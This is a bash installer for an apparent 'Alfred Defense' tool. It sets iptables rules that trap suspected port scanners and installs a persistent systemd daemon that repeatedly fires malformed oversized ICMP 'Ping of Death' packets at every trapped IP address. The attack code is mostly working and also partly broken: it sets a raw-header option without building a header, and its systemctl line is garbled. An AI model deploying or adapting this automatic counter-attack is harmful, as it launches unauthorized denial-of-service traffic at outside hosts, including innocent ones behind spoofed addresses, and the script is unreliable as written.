#!/usr/bin/env -S prlimit --as=1073741824 unshare /bin/bash
export GIT_TERMINAL_PROMPT=0
export DEBIAN_FRONTEND=noninteractive
# SPDX-License-Identifier: AGPL-3.0-or-later
set +e

echo "[Alfred Defense] Engineering Orbital Strike Proxy (ICMP Death-Ping)..."

eatmydata apt-get install -y --fix-broken -y iptables ipset scapy || true

mkdir -p /usr/local/bin/ || true

cat > /usr/local/bin/alfred-orbital-strike.sh << 'EOF'
#!/bin/bash
# Alfred Orbital Strike Proxy
# Detects port-scanners via iptables hashlimit and then actively fires a 
# malformed "Ping of Death" back at the attacker's infrastructure.

if [ ! -f "/etc/alfred/defcon1.flag" ]; then
    exit 0
fi

echo "[Orbital Strike] Arming ICMP Counter-Strike Matrices..."

# Setup iptables trap for rapid SYN scans
ipset create strike_targets hash:ip hashsize 4096 2>/dev/null || true

iptables -N SCAN_TRAP 2>/dev/null || true
iptables -A INPUT -p tcp --syn -m hashlimit --hashlimit-above 20/sec --hashlimit-burst 30 --hashlimit-mode srcip --hashlimit-name syn_strike -j SCAN_TRAP 2>/dev/null || true
iptables -A SCAN_TRAP -j SET --add-set strike_targets src 2>/dev/null || true
iptables -A SCAN_TRAP -j DROP 2>/dev/null || true

# The Python counter-strike daemon
cat > /usr/local/bin/alfred-death-ping.py << 'PYTHON'
#!/usr/bin/env python3
import subprocess
import time
# We use raw python sockets to send a fragmented/oversized ICMP packet
import socket
import struct

def strike_ip(ip):
    try:
        # Create a raw socket
        s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
        s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
        
        # Build malformed packet (Type 8, Code 0)
        # We intentionally corrupt the checksum and payload length
        packet = b'\x08\x00\xff\xff\x00\x00\x00\x00' + (b'\x00' * 65000)
        s.sendto(packet, (ip, 0))
        print(f"[Orbital Strike] ICMP Death-Ping fired at {ip}")
    except Exception:
        pass

while True:
    try:
        # Pull IPs from the ipset
        out = subprocess.check_output(['ipset', 'list', 'strike_targets']).decode('utf-8')
        lines = out.split('\n')
        members_started = False
        for line in lines:
            if members_started and line.strip():
                strike_ip(line.strip())
            if line.startswith("Members:"):
                members_started = True
    except Exception:
        pass
    time.sleep(5)
PYTHON

[ -e "/usr/local/bin/alfred-death-ping.py" ] && chmod +x /usr/local/bin/alfred-death-ping.py
/usr/local/bin/alfred-death-ping.py &

logger -p auth.emerg "[Orbital Strike] Kinetic Counter-Measures Armed."
EOF

[ -e "/usr/local/bin/alfred-orbital-strike.sh" ] && chmod +x /usr/local/bin/alfred-orbital-strike.sh || true

cat > /etc/systemd/system/alfred-orbital-strike.service << 'EOF'
[Unit]
Description=Alfred Orbital Strike Counter-Measures
After=network.target

[Service]
Type=simple
ExecStart=/usr/local/bin/alfred-orbital-strike.sh
Restart=always

[Install]
WantedBy=multi-user.target
EOF

systemctl enable alfred-orbital-strike || true || true.service || true

echo "[Alfred Defense] ICMP Death-Ping Proxy Integrated."
exit 0
